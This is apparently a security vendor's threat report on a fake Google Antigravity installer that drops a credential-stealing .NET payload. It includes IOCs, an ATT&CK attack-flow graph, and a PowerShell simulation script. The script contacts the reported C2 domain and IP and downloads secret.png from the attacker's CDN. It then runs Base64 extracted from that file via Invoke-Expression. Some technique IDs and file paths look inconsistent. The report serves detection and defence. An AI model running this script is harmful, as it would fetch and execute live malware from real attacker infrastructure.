Fake Google Antigravity Pages Steal User Accounts in Minutes

SOC Prime Team

Fake Google Antigravity Pages Steal User Accounts in Minutes

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

A malicious installer impersonating Google Antigravity is being distributed through a lookalike domain. Once executed, it launches a hidden PowerShell downloader that connects to a command-and-control server, weakens Windows Defender protections, and deploys a stealthy .NET-based stealer. The malware is capable of harvesting browser credentials, messaging session tokens, cryptocurrency wallet files, and even recording keystrokes. Persistence is maintained through a scheduled task that launches a disguised conhost.exe process.

Investigation

Researchers reviewed the MSI custom action table and discovered an additional action responsible for launching the embedded PowerShell script. Network analysis revealed an initial HTTPS request to opus-dsn.com, followed by follow-on downloads from infrastructure hosted on BunnyCDN. Investigators also observed registry changes, Windows Defender exclusions, and the creation of a scheduled task tied to persistence. The final payload arrived as an encrypted .NET assembly disguised as a fake PNG image.

Mitigation

Organizations should block access to the identified malicious domains and IP address, require code-signing validation for installers, and monitor closely for unexpected changes to Windows Defender exclusions. Security teams should also detect the creation of suspicious scheduled tasks and unauthorized registry modifications involving AmsiEnable. User awareness remains important, especially around verifying official download URLs before installing AI-related tools or utilities.

Response

If a system connects to opus-dsn.com or retrieves the secret.png payload, defenders should isolate the endpoint immediately, remove the scheduled task, delete the encrypted malware file, and reverse any malicious Defender exclusion changes. All potentially exposed credentials should be rotated, particularly those related to email, financial services, and cryptocurrency accounts. Where feasible, a full system rebuild should be performed to ensure the host is completely clean.

"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes – Actions action_user_execution["Action – T1204.002 User Execution Description: Victim downloads and runs a malicious installer that appears legitimate."] class action_user_execution action action_event_triggered_execution["Action – T1546.016 Event Triggered Execution Installer Packages Description: Custom action in the MSI executes a PowerShell script which drops additional files and contacts a remote URL."] class action_event_triggered_execution action action_web_protocols["Action – T1071.001 Application Layer Protocol Web Protocols Description: PowerShell downloader uses HTTPS to retrieve code from a remote server."] class action_web_protocols action action_lateral_tool_transfer["Action – T1570 Lateral Tool Transfer Description: Downloader pulls extra payloads (secret.png, GGn.xml) from a CDN."] class action_lateral_tool_transfer action action_steganography["Action – T1027.003 Obfuscated Files or Information Steganography Description: Malicious payload is hidden inside a PNG file using AESu2011256u2011CBC encryption."] class action_steganography action action_masquerading["Action – T1036.008 Masquerade File Type Description: Encrypted assembly is disguised as an image file and installer mimics a Google product."] class action_masquerading action action_impair_defenses["Action – T1562 Impair Defenses Description: Addu2011MpPreference modifies Windows Defender exclusions and sets registry to bypass security features."] class action_impair_defenses action action_subvert_trust_controls["Action – T1553 Subvert Trust Controls Description: Registry edits disable AMSI and other trust mechanisms."] class action_subvert_trust_controls action action_credential_stealing["Action – T1555.003 Credentials from Web Browsers & T1539 Steal Web Session Cookie Description: .NET stealer extracts passwords, cookies, autofill data, Discord tokens and crypto wallet information."] class action_credential_stealing action action_browser_discovery["Action – T1217 Browser Information Discovery Description: Malware enumerates installed browsers to target credential stores."] class action_browser_discovery action action_scheduled_task["Action – T1053 Scheduled Task Job Description: Creates a persistent scheduled task that runs conhost.exe which launches PowerShell to load the payload at logon."] class action_scheduled_task action action_remote_access["Action – T1219 Remote Access Tools Description: Loaded .NET assemblies provide remote control capabilities to the attacker."] class action_remote_access action action_bidirectional_comm["Action – T1102.002 Web Service Bidirectional Communication Description: Beaconing to a remote web service for profiling and further instructions."] class action_bidirectional_comm action %% Nodes – Tools / Artifacts tool_msi_installer["Tool – Name: Malicious MSI Installer Purpose: Delivered to victim via fake Google site."] class tool_msi_installer tool tool_ps1_script["Tool – Name: PowerShell Dropper Script (scr5020.ps1, pss5032.ps1) Purpose: Drops additional files and contacts C2."] class tool_ps1_script tool tool_powershell_downloader["Tool – Name: PowerShell Downloader Purpose: Retrieves code and additional payloads over HTTPS."] class tool_powershell_downloader tool artifact_secret_png["Tool – Name: secret.png (steganographic carrier) Purpose: Holds encrypted .NET assembly."] class artifact_secret_png tool artifact_GGn_xml["Tool – Name: GGn.xml Purpose: Additional configuration data used by the malware."] class artifact_GGn_xml tool malware_dotnet_assembly["Malware – Name: Encrypted .NET Assembly Purpose: Provides core malicious functionality after decryption."] class malware_dotnet_assembly malware process_conhost["Process – Name: conhost.exe Purpose: Launched by scheduled task to execute PowerShell payload."] class process_conhost process process_schtasks["Process – Name: schtasks.exe Purpose: Creates the persistent scheduled task."] class process_schtasks process malware_rat["Malware – Name: Remote Access Tool Payload Purpose: Enables attacker control of the infected host."] class malware_rat malware process_beacon["Process – Name: Beacon Communication Purpose: Sends data to opus-dsn.com and receives commands."] class process_beacon process %% Flow connections action_user_execution –>|downloads and runs| tool_msi_installer tool_msi_installer –>|triggers custom action| action_event_triggered_execution action_event_triggered_execution –>|drops| tool_ps1_script tool_ps1_script –>|contacts remote URL| action_web_protocols action_web_protocols –>|uses| tool_powershell_downloader tool_powershell_downloader –>|retrieves| action_lateral_tool_transfer action_lateral_tool_transfer –>|gets| artifact_secret_png action_lateral_tool_transfer –>|gets| artifact_GGn_xml artifact_secret_png –>|contains hidden payload| action_steganography action_steganography –>|reveals| malware_dotnet_assembly malware_dotnet_assembly –>|is disguised as| action_masquerading action_impair_defenses –>|adds exclusions| action_subvert_trust_controls action_impair_defenses –>|modifies defender settings| tool_ps1_script action_subvert_trust_controls –>|disables AMSI| tool_ps1_script action_credential_stealing –>|performed by| malware_dotnet_assembly malware_dotnet_assembly –>|extracts credentials| action_browser_discovery action_browser_discovery –>|enumerates browsers via| process_conhost action_scheduled_task –>|creates| process_schtasks process_schtasks –>|launches| process_conhost process_conhost –>|executes| tool_powershell_downloader process_conhost –>|loads| malware_dotnet_assembly malware_dotnet_assembly –>|enables| action_remote_access action_remote_access –>|uses| malware_rat malware_rat –>|communicates with| action_bidirectional_comm action_bidirectional_comm –>|to| process_beacon %% Class assignments class action_user_execution action class action_event_triggered_execution action class action_web_protocols action class action_lateral_tool_transfer action class action_steganography action class action_masquerading action class action_impair_defenses action class action_subvert_trust_controls action class action_credential_stealing action class action_browser_discovery action class action_scheduled_task action class action_remote_access action class action_bidirectional_comm action class tool_msi_installer tool class tool_ps1_script tool class tool_powershell_downloader tool class artifact_secret_png tool class artifact_GGn_xml tool class malware_dotnet_assembly malware class malware_rat malware class process_conhost process class process_schtasks process class process_beacon process "

Attack Flow

Attack Narrative & Commands:
An adversary distributes a malicious “Antigravity Installer” that appears legitimate. Upon execution, the installer performs the following steps:
1. Execution via Signed Binary (T1216): Launches msiexec.exe to run a disguised MSI payload, avoiding execution‑prevention tools.
2. Outbound C2 Contact (T1127.003 & T1546.016): Immediately contacts the hard‑coded malicious domain opus-dsn.com and IP 89.124.96.27 to retrieve further instructions.
3. Payload Retrieval (T1564.012): Downloads a PNG file from captr.b-cdn.net/secret.png that actually contains a hidden PowerShell script (steganographically embedded).
4. Execution of Hidden Script: The script extracts and runs, establishing persistence via a COM hijack.
These actions generate firewall log entries that match the Sigma rule’s selectors, thereby producing an alert.

Regression Test Script: The script below reproduces the malicious behaviour in a controlled lab environment.

#=============================================================================
# Fake Antigravity Installer – Regression Test Script
#=============================================================================
# 1. Run via signed binary (msiexec) – simulated by PowerShell start‑process
# 2. Contact malicious domain and IP
# 3. Download hidden payload (PNG) and execute embedded script
#=============================================================================

# ---- Step 1: Simulate signed binary execution --------------------------------
$msiPath = "$env:TEMPAntigravityInstaller.msi"
# Create a dummy MSI (empty file) – in real test the binary would be signed
New-Item -Path $msiPath -ItemType File -Force | Out-Null
Start-Process -FilePath "msiexec.exe" -ArgumentList "/i `"$msiPath`" /quiet" -WindowStyle Hidden

# ---- Step 2: Contact malicious C2 -------------------------------------------
$c2Domain = "http://opus-dsn.com"
$c2IP = "http://89.124.96.27"
try {
    Invoke-WebRequest -Uri $c2Domain -UseBasicParsing -TimeoutSec 5 | Out-Null
} catch { }

try {
    Invoke-WebRequest -Uri $c2IP -UseBasicParsing -TimeoutSec 5 | Out-Null
} catch { }

# ---- Step 3: Download hidden payload (PNG) -----------------------------------
$payloadUrl = "http://captr.b-cdn.net/secret.png"
$payloadPath = "$env:TEMPsecret.png"
Invoke-WebRequest -Uri $payloadUrl -OutFile $payloadPath -UseBasicParsing

# Extract the hidden PowerShell script (simple Base64 example)
$encoded = Get-Content $payloadPath -Raw | Select-String -Pattern "^[A-Za-z0-9+/=]{100,}$" -AllMatches |
            ForEach-Object { $_.Matches.Value } | Out-String
if ($encoded) {
    $script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encoded))
    Invoke-Expression $script
}

# ---- Cleanup temporary files -------------------------------------------------
Remove-Item -Path $msiPath -Force -ErrorAction SilentlyContinue
Remove-Item -Path $payloadPath -Force -ErrorAction SilentlyContinue

Cleanup Commands: Remove any artefacts created during the simulation.

# Terminate any lingering msiexec processes started by the test
Get-Process msiexec -ErrorAction SilentlyContinue | Stop-Process -Force

# Delete temporary files (already attempted in script, repeat for safety)
Remove-Item -Path "$env:TEMPAntigravityInstaller.msi" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMPsecret.png" -Force -ErrorAction SilentlyContinue

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free